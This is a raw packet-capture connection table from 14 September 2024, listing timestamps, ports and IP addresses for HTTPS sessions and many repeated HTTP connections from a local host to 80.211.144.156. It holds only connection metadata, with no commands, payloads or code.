Sep 14, 2024 12:52:05.343769073 CEST	49731	443	192.168.2.4	172.67.203.125
Sep 14, 2024 12:52:05.343859911 CEST	443	49731	172.67.203.125	192.168.2.4
Sep 14, 2024 12:52:05.343965054 CEST	49731	443	192.168.2.4	172.67.203.125
Sep 14, 2024 12:52:05.344383955 CEST	49731	443	192.168.2.4	172.67.203.125
Sep 14, 2024 12:52:05.344451904 CEST	443	49731	172.67.203.125	192.168.2.4
Sep 14, 2024 12:52:05.814855099 CEST	443	49731	172.67.203.125	192.168.2.4
Sep 14, 2024 12:52:05.817413092 CEST	49731	443	192.168.2.4	172.67.203.125
Sep 14, 2024 12:52:05.817508936 CEST	443	49731	172.67.203.125	192.168.2.4
Sep 14, 2024 12:52:05.984344006 CEST	443	49731	172.67.203.125	192.168.2.4
Sep 14, 2024 12:52:05.984581947 CEST	443	49731	172.67.203.125	192.168.2.4
Sep 14, 2024 12:52:05.984653950 CEST	49731	443	192.168.2.4	172.67.203.125
Sep 14, 2024 12:52:05.985157967 CEST	49731	443	192.168.2.4	172.67.203.125
Sep 14, 2024 12:52:08.051495075 CEST	49733	443	192.168.2.4	104.20.3.235
Sep 14, 2024 12:52:08.051533937 CEST	443	49733	104.20.3.235	192.168.2.4
Sep 14, 2024 12:52:08.051588058 CEST	49733	443	192.168.2.4	104.20.3.235
Sep 14, 2024 12:52:08.053054094 CEST	49733	443	192.168.2.4	104.20.3.235
Sep 14, 2024 12:52:08.053070068 CEST	443	49733	104.20.3.235	192.168.2.4
Sep 14, 2024 12:52:08.550093889 CEST	443	49733	104.20.3.235	192.168.2.4
Sep 14, 2024 12:52:08.550179005 CEST	49733	443	192.168.2.4	104.20.3.235
Sep 14, 2024 12:52:08.552803993 CEST	49733	443	192.168.2.4	104.20.3.235
Sep 14, 2024 12:52:08.552809954 CEST	443	49733	104.20.3.235	192.168.2.4
Sep 14, 2024 12:52:08.553203106 CEST	443	49733	104.20.3.235	192.168.2.4
Sep 14, 2024 12:52:08.554126024 CEST	49733	443	192.168.2.4	104.20.3.235
Sep 14, 2024 12:52:08.595448971 CEST	443	49733	104.20.3.235	192.168.2.4
Sep 14, 2024 12:52:08.702208996 CEST	443	49733	104.20.3.235	192.168.2.4
Sep 14, 2024 12:52:08.702430964 CEST	443	49733	104.20.3.235	192.168.2.4
Sep 14, 2024 12:52:08.702488899 CEST	49733	443	192.168.2.4	104.20.3.235
Sep 14, 2024 12:52:08.702763081 CEST	49733	443	192.168.2.4	104.20.3.235
Sep 14, 2024 12:52:09.011667967 CEST	49734	443	192.168.2.4	128.116.123.4
Sep 14, 2024 12:52:09.011755943 CEST	443	49734	128.116.123.4	192.168.2.4
Sep 14, 2024 12:52:09.011853933 CEST	49734	443	192.168.2.4	128.116.123.4
Sep 14, 2024 12:52:09.012193918 CEST	49734	443	192.168.2.4	128.116.123.4
Sep 14, 2024 12:52:09.012228966 CEST	443	49734	128.116.123.4	192.168.2.4
Sep 14, 2024 12:52:09.748704910 CEST	443	49734	128.116.123.4	192.168.2.4
Sep 14, 2024 12:52:09.749041080 CEST	49734	443	192.168.2.4	128.116.123.4
Sep 14, 2024 12:52:09.750436068 CEST	49734	443	192.168.2.4	128.116.123.4
Sep 14, 2024 12:52:09.750467062 CEST	443	49734	128.116.123.4	192.168.2.4
Sep 14, 2024 12:52:09.750987053 CEST	443	49734	128.116.123.4	192.168.2.4
Sep 14, 2024 12:52:09.751871109 CEST	49734	443	192.168.2.4	128.116.123.4
Sep 14, 2024 12:52:09.795449018 CEST	443	49734	128.116.123.4	192.168.2.4
Sep 14, 2024 12:52:10.214063883 CEST	443	49734	128.116.123.4	192.168.2.4
Sep 14, 2024 12:52:10.214232922 CEST	443	49734	128.116.123.4	192.168.2.4
Sep 14, 2024 12:52:10.214303017 CEST	49734	443	192.168.2.4	128.116.123.4
Sep 14, 2024 12:52:10.214562893 CEST	49734	443	192.168.2.4	128.116.123.4
Sep 14, 2024 12:52:11.881218910 CEST	49735	443	192.168.2.4	104.20.23.46
Sep 14, 2024 12:52:11.881295919 CEST	443	49735	104.20.23.46	192.168.2.4
Sep 14, 2024 12:52:11.881386995 CEST	49735	443	192.168.2.4	104.20.23.46
Sep 14, 2024 12:52:11.881712914 CEST	49735	443	192.168.2.4	104.20.23.46
Sep 14, 2024 12:52:11.881751060 CEST	443	49735	104.20.23.46	192.168.2.4
Sep 14, 2024 12:52:12.380387068 CEST	443	49735	104.20.23.46	192.168.2.4
Sep 14, 2024 12:52:12.380511045 CEST	49735	443	192.168.2.4	104.20.23.46
Sep 14, 2024 12:52:12.382168055 CEST	49735	443	192.168.2.4	104.20.23.46
Sep 14, 2024 12:52:12.382200956 CEST	443	49735	104.20.23.46	192.168.2.4
Sep 14, 2024 12:52:12.382699966 CEST	443	49735	104.20.23.46	192.168.2.4
Sep 14, 2024 12:52:12.383600950 CEST	49735	443	192.168.2.4	104.20.23.46
Sep 14, 2024 12:52:12.427434921 CEST	443	49735	104.20.23.46	192.168.2.4
Sep 14, 2024 12:52:12.541488886 CEST	443	49735	104.20.23.46	192.168.2.4
Sep 14, 2024 12:52:12.541729927 CEST	443	49735	104.20.23.46	192.168.2.4
Sep 14, 2024 12:52:12.541805983 CEST	49735	443	192.168.2.4	104.20.23.46
Sep 14, 2024 12:52:12.542076111 CEST	49735	443	192.168.2.4	104.20.23.46
Sep 14, 2024 12:53:04.337290049 CEST	62761	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:04.342165947 CEST	80	62761	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:04.342293978 CEST	62761	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:04.342627048 CEST	62761	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:04.347454071 CEST	80	62761	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:04.697323084 CEST	62761	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:04.702300072 CEST	80	62761	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:05.144176006 CEST	80	62761	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:05.144197941 CEST	80	62761	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:05.144207954 CEST	80	62761	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:05.144213915 CEST	80	62761	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:05.144390106 CEST	62761	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:05.226886988 CEST	62761	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:05.234030962 CEST	80	62761	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:05.442635059 CEST	80	62761	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:05.442964077 CEST	62761	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:05.448898077 CEST	80	62761	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:05.729765892 CEST	80	62761	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:05.889813900 CEST	62761	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:07.113933086 CEST	62761	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:07.114686012 CEST	62762	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:07.119281054 CEST	80	62761	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:07.119348049 CEST	62761	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:07.119524002 CEST	80	62762	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:07.119592905 CEST	62762	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:07.119715929 CEST	62762	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:07.124573946 CEST	80	62762	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:07.202866077 CEST	62763	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:07.207746983 CEST	80	62763	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:07.207932949 CEST	62763	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:07.207932949 CEST	62763	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:07.212794065 CEST	80	62763	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:07.478322983 CEST	62762	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:07.483673096 CEST	80	62762	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:07.483692884 CEST	80	62762	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:07.556240082 CEST	62763	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:07.561261892 CEST	80	62763	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:07.813839912 CEST	80	62762	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:07.883064985 CEST	80	62763	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:07.915340900 CEST	62762	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:07.949826002 CEST	80	62762	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:08.014039040 CEST	80	62763	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:08.014106989 CEST	62763	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:08.102853060 CEST	62762	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:08.146605968 CEST	62766	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:08.150432110 CEST	62762	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:08.150578976 CEST	62763	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:08.333759069 CEST	80	62762	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:08.333828926 CEST	62762	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:08.335558891 CEST	80	62766	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:08.335629940 CEST	62766	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:08.335813999 CEST	62766	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:08.336235046 CEST	80	62762	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:08.336265087 CEST	80	62763	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:08.336323977 CEST	62762	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:08.336361885 CEST	62763	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:08.340646029 CEST	80	62766	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:08.681015968 CEST	62766	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:08.689666986 CEST	80	62766	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:09.009130001 CEST	80	62766	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:09.071568012 CEST	62766	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:09.140309095 CEST	80	62766	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:09.140636921 CEST	62766	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:09.145839930 CEST	80	62766	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:09.145915985 CEST	62766	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:10.172640085 CEST	62768	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:10.177767038 CEST	80	62768	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:10.177862883 CEST	62768	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:10.178189039 CEST	62768	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:10.183466911 CEST	80	62768	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:10.524940968 CEST	62768	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:10.532854080 CEST	80	62768	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:10.862967014 CEST	80	62768	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:10.915349960 CEST	62768	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:11.060072899 CEST	80	62768	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:11.102844954 CEST	62768	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:12.964961052 CEST	62769	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:12.964968920 CEST	62768	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:13.415352106 CEST	62768	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:13.676683903 CEST	80	62769	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:13.676752090 CEST	80	62768	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:13.676949024 CEST	62769	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:13.677635908 CEST	80	62768	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:13.677700996 CEST	62769	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:13.677784920 CEST	62768	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:13.682549953 CEST	80	62769	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:14.024821997 CEST	62769	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:14.030047894 CEST	80	62769	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:14.030083895 CEST	80	62769	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:14.264869928 CEST	62770	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:14.269946098 CEST	80	62770	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:14.270015955 CEST	62770	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:14.270376921 CEST	62770	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:14.275604963 CEST	80	62770	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:14.359977961 CEST	80	62769	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:14.492069960 CEST	80	62769	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:14.492134094 CEST	62769	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:14.618558884 CEST	62770	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:14.623543024 CEST	80	62770	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:14.782272100 CEST	62770	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:14.787657976 CEST	80	62770	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:14.787761927 CEST	62770	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:15.330225945 CEST	62769	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:15.330972910 CEST	62771	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:15.335777998 CEST	80	62769	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:15.335851908 CEST	80	62771	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:15.335853100 CEST	62769	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:15.335928917 CEST	62771	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:15.336014986 CEST	62771	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:15.341768026 CEST	80	62771	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:15.681031942 CEST	62771	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:15.685930014 CEST	80	62771	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:16.001389027 CEST	80	62771	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:16.102998018 CEST	62771	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:16.128463030 CEST	80	62771	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:16.212300062 CEST	62771	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:16.549751997 CEST	62771	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:16.550343037 CEST	62773	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:16.554903984 CEST	80	62771	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:16.555227995 CEST	80	62773	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:16.555316925 CEST	62771	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:16.555321932 CEST	62773	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:16.555443048 CEST	62773	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:16.560266972 CEST	80	62773	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:16.903414011 CEST	62773	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:16.908879042 CEST	80	62773	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:17.239284992 CEST	80	62773	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:17.372342110 CEST	80	62773	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:17.372414112 CEST	62773	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:18.006936073 CEST	62773	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:18.081490993 CEST	80	62773	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:18.081562996 CEST	62773	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:18.151572943 CEST	62774	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:18.156408072 CEST	80	62774	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:18.156487942 CEST	62774	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:18.156620979 CEST	62774	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:18.161421061 CEST	80	62774	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:18.509180069 CEST	62774	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:18.514071941 CEST	80	62774	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:18.840773106 CEST	80	62774	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:18.915371895 CEST	62774	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:18.972451925 CEST	80	62774	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:19.102852106 CEST	62774	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:19.494124889 CEST	62774	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:19.494657040 CEST	62776	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:19.499476910 CEST	80	62774	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:19.499550104 CEST	62774	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:19.499581099 CEST	80	62776	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:19.499655008 CEST	62776	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:19.499731064 CEST	62776	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:19.504642010 CEST	80	62776	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:19.853044987 CEST	62776	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:19.858087063 CEST	80	62776	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:19.858145952 CEST	80	62776	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:20.165491104 CEST	80	62776	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:20.212265015 CEST	62776	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:20.365091085 CEST	80	62776	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:20.509131908 CEST	62776	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:21.178113937 CEST	62776	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:21.178503990 CEST	62777	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:21.245361090 CEST	80	62777	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:21.245461941 CEST	62777	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:21.245578051 CEST	62777	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:21.246093988 CEST	80	62776	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:21.246164083 CEST	62776	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:21.251367092 CEST	80	62777	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:21.602936983 CEST	62777	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:21.608190060 CEST	80	62777	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:21.913300991 CEST	80	62777	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:22.044972897 CEST	80	62777	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:22.045052052 CEST	62777	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:23.922367096 CEST	62777	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:23.923399925 CEST	62778	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:23.927603960 CEST	80	62777	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:23.927665949 CEST	62777	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:23.928286076 CEST	80	62778	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:23.928366899 CEST	62778	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:23.928507090 CEST	62778	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:23.933331966 CEST	80	62778	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:24.275871992 CEST	62778	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:24.280925035 CEST	80	62778	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:24.594178915 CEST	80	62778	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:24.724431038 CEST	80	62778	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:24.724538088 CEST	62778	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:24.866014004 CEST	62778	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:24.866631985 CEST	62779	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:24.871251106 CEST	80	62778	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:24.871366024 CEST	62778	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:24.871474028 CEST	80	62779	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:24.871620893 CEST	62779	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:24.871753931 CEST	62779	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:24.876502037 CEST	80	62779	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:25.227947950 CEST	62779	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:25.232871056 CEST	80	62779	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:25.538723946 CEST	80	62779	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:25.674169064 CEST	80	62779	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:25.674233913 CEST	62779	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:25.808995008 CEST	62779	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:25.810678005 CEST	62780	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:25.815422058 CEST	80	62779	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:25.815495968 CEST	62779	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:25.816715002 CEST	80	62780	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:25.816791058 CEST	62780	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:25.816932917 CEST	62780	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:25.821794033 CEST	80	62780	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:25.836963892 CEST	62781	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:25.841773987 CEST	80	62781	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:25.842442036 CEST	62781	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:25.842598915 CEST	62781	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:25.847373009 CEST	80	62781	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:26.172389984 CEST	62780	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:26.177521944 CEST	80	62780	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:26.177546024 CEST	80	62780	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:26.196747065 CEST	62781	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:26.201738119 CEST	80	62781	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:26.503853083 CEST	80	62781	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:26.508223057 CEST	80	62780	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:26.571652889 CEST	62780	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:26.602912903 CEST	62781	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:26.631611109 CEST	80	62781	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:26.632370949 CEST	62780	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:26.637624025 CEST	80	62780	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:26.637691975 CEST	62780	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:26.712265968 CEST	62781	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:27.084197044 CEST	62781	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:27.085550070 CEST	62782	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:27.089354038 CEST	80	62781	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:27.090023994 CEST	62781	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:27.090464115 CEST	80	62782	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:27.090588093 CEST	62782	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:27.090694904 CEST	62782	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:27.095493078 CEST	80	62782	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:27.446721077 CEST	62782	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:27.451592922 CEST	80	62782	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:27.758785009 CEST	80	62782	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:27.837310076 CEST	62782	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:27.889146090 CEST	80	62782	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:27.989172935 CEST	62782	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:28.010308981 CEST	62782	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:28.010962963 CEST	62783	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:28.015646935 CEST	80	62782	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:28.015717983 CEST	62782	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:28.016022921 CEST	80	62783	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:28.016100883 CEST	62783	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:28.016199112 CEST	62783	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:28.021051884 CEST	80	62783	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:28.368666887 CEST	62783	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:28.373908043 CEST	80	62783	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:28.684290886 CEST	80	62783	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:28.759160995 CEST	62783	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:28.883975983 CEST	80	62783	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:29.071430922 CEST	62783	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:29.076849937 CEST	80	62783	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:29.079514980 CEST	62783	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:29.080257893 CEST	62784	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:29.085175037 CEST	80	62784	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:29.085273027 CEST	62784	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:29.085387945 CEST	62784	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:29.090143919 CEST	80	62784	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:29.431091070 CEST	62784	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:29.436153889 CEST	80	62784	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:29.778774977 CEST	80	62784	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:29.826992035 CEST	62785	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:29.827303886 CEST	62784	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:29.834450006 CEST	80	62785	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:29.834522009 CEST	62785	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:29.834629059 CEST	62785	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:29.835642099 CEST	80	62784	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:29.835746050 CEST	62784	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:29.839823961 CEST	80	62785	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:30.037081957 CEST	62786	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:30.041982889 CEST	80	62786	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:30.043411970 CEST	62786	80	192.168.2.4	80.211.144.156
